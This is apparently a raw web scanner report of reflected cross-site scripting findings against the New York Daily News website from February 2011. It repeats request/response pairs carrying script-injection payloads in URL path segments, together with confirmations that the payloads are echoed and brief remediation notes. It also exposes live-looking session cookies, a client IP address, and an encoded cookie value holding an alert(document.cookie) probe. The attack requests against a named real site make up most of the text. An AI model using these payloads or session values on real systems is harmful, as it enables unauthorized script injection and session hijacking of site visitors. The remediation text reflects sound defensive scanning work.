GET /index.htmlabc66'%3balert(1)//14705d4d725 HTTP/1.1
Host: www.nydailynews.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1296236506383:ss=1296236490305
Response
HTTP/1.1 404 Not Found
Date: Tue, 08 Feb 2011 17:26:48 GMT
Server: Apache
Keep-Alive: timeout=3, max=994
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en
Vary: Accept-encoding
Set-Cookie: sto-id-sg-web-8080=CAACAKAK; Expires=Tue, 08-Feb-2011 18:26:19 GMT; Path=/
Content-Length: 70201
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 14b06'%3balert(1)//36aeeedcf00 was submitted in the REST URL parameter 1. This input was echoed as 14b06';alert(1)//36aeeedcf00 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /14b06'%3balert(1)//36aeeedcf00 HTTP/1.1
Host: www.nydailynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found
Date: Tue, 08 Feb 2011 18:35:26 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Language: en
Content-Length: 70062
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7ba63'%3balert(1)//c10bfc1ca5c was submitted in the REST URL parameter 1. This input was echoed as 7ba63';alert(1)//c10bfc1ca5c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /jobs7ba63'%3balert(1)//c10bfc1ca5c/index.html HTTP/1.1
Host: www.nydailynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 18:36:27 GMT Server: Apache Connection: close Content-Type: text/html Content-Language: en Content-Length: 70077
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d3747'%3balert(1)//44241014bc7 was submitted in the REST URL parameter 2. This input was echoed as d3747';alert(1)//44241014bc7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /jobs/index.htmld3747'%3balert(1)//44241014bc7 HTTP/1.1
Host: www.nydailynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found
Date: Tue, 08 Feb 2011 18:36:47 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Language: en
Content-Length: 70077
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5dfc7'%3b36d314d5bc6 was submitted in the REST URL parameter 1. This input was echoed as 5dfc7';36d314d5bc6 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news5dfc7'%3b36d314d5bc6/national/2011/02/08/ HTTP/1.1
Host: www.nydailynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response (redirected)
HTTP/1.1 404 Not Found
Date: Tue, 08 Feb 2011 18:25:05 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Language: en
Content-Length: 70091
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f2d6d'%3b2d1c1a320fc was submitted in the REST URL parameter 2. This input was echoed as f2d6d';2d1c1a320fc in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/nationalf2d6d'%3b2d1c1a320fc/2011/02/08/ HTTP/1.1
Host: www.nydailynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response (redirected)
HTTP/1.1 404 Not Found
Date: Tue, 08 Feb 2011 18:25:28 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Language: en
Content-Length: 70091
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f2da5'%3bd4c2946b5b5 was submitted in the REST URL parameter 3. This input was echoed as f2da5';d4c2946b5b5 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/national/2011f2da5'%3bd4c2946b5b5/02/08/ HTTP/1.1
Host: www.nydailynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response (redirected)
HTTP/1.1 404 Not Found
Date: Tue, 08 Feb 2011 18:25:46 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Language: en
Content-Length: 70089
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7f0e0'%3bbcdc394af78 was submitted in the REST URL parameter 4. This input was echoed as 7f0e0';bcdc394af78 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/national/2011/027f0e0'%3bbcdc394af78/08/ HTTP/1.1
Host: www.nydailynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response (redirected)
HTTP/1.1 404 Not Found
Date: Tue, 08 Feb 2011 18:26:06 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Language: en
Content-Length: 70089
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ed517'%3bac58ed0a047 was submitted in the REST URL parameter 5. This input was echoed as ed517';ac58ed0a047 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/national/2011/02/08ed517'%3bac58ed0a047/ HTTP/1.1
Host: www.nydailynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response (redirected)
HTTP/1.1 404 Not Found
Date: Tue, 08 Feb 2011 18:26:46 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Language: en
Content-Length: 70089
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a7c32'%3balert(1)//eb9ee865360 was submitted in the REST URL parameter 1. This input was echoed as a7c32';alert(1)//eb9ee865360 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /newsa7c32'%3balert(1)//eb9ee865360/national/2011/02/08/2011-02-08_matthew_hoffman_killer_who_hid_bodies_in_hollowedout_tree_details_crime_in_chill.html HTTP/1.1
Host: www.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/index.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; sto-id-sg-web-8080=CBACAKAK; Zvents=1djug47bp7; __vrf=3k7r5l65ggtu5gva; sto-id-sg-nydnapp-8080=CBADAKAK; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189499544:ss=1297189499544; zvents_tracker_sid=12971859055740.8106075366958976; __qca=P0-1704281983-1297185912293
Response
HTTP/1.1 404 Not Found
Date: Tue, 08 Feb 2011 17:26:09 GMT
Server: Apache
Keep-Alive: timeout=3, max=998
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en
Vary: Accept-encoding
Content-Length: 70312
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ca83c'%3balert(1)//55db44aadf1 was submitted in the REST URL parameter 2. This input was echoed as ca83c';alert(1)//55db44aadf1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/nationalca83c'%3balert(1)//55db44aadf1/2011/02/08/2011-02-08_matthew_hoffman_killer_who_hid_bodies_in_hollowedout_tree_details_crime_in_chill.html HTTP/1.1
Host: www.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/index.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; sto-id-sg-web-8080=CBACAKAK; Zvents=1djug47bp7; __vrf=3k7r5l65ggtu5gva; sto-id-sg-nydnapp-8080=CBADAKAK; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189499544:ss=1297189499544; zvents_tracker_sid=12971859055740.8106075366958976; __qca=P0-1704281983-1297185912293
Response
HTTP/1.1 404 Not Found
Date: Tue, 08 Feb 2011 17:26:10 GMT
Server: Apache
Keep-Alive: timeout=3, max=994
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en
Vary: Accept-encoding
Content-Length: 70312
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 14551'%3balert(1)//04c35b79461 was submitted in the REST URL parameter 3. This input was echoed as 14551';alert(1)//04c35b79461 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/national/201114551'%3balert(1)//04c35b79461/02/08/2011-02-08_matthew_hoffman_killer_who_hid_bodies_in_hollowedout_tree_details_crime_in_chill.html HTTP/1.1
Host: www.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/index.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; sto-id-sg-web-8080=CBACAKAK; Zvents=1djug47bp7; __vrf=3k7r5l65ggtu5gva; sto-id-sg-nydnapp-8080=CBADAKAK; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189499544:ss=1297189499544; zvents_tracker_sid=12971859055740.8106075366958976; __qca=P0-1704281983-1297185912293
Response
HTTP/1.1 404 Not Found
Date: Tue, 08 Feb 2011 17:26:14 GMT
Server: Apache
Keep-Alive: timeout=3, max=1000
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en
Vary: Accept-encoding
Content-Length: 70312
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1f8c1'%3balert(1)//a4dbf05e009 was submitted in the REST URL parameter 4. This input was echoed as 1f8c1';alert(1)//a4dbf05e009 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/national/2011/021f8c1'%3balert(1)//a4dbf05e009/08/2011-02-08_matthew_hoffman_killer_who_hid_bodies_in_hollowedout_tree_details_crime_in_chill.html HTTP/1.1
Host: www.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/index.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; sto-id-sg-web-8080=CBACAKAK; Zvents=1djug47bp7; __vrf=3k7r5l65ggtu5gva; sto-id-sg-nydnapp-8080=CBADAKAK; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189499544:ss=1297189499544; zvents_tracker_sid=12971859055740.8106075366958976; __qca=P0-1704281983-1297185912293
Response
HTTP/1.1 404 Not Found
Date: Tue, 08 Feb 2011 17:26:16 GMT
Server: Apache
Keep-Alive: timeout=3, max=1000
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en
Vary: Accept-encoding
Content-Length: 70312
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4e6aa'%3balert(1)//794c4c0d2b8 was submitted in the REST URL parameter 5. This input was echoed as 4e6aa';alert(1)//794c4c0d2b8 in the application's response.
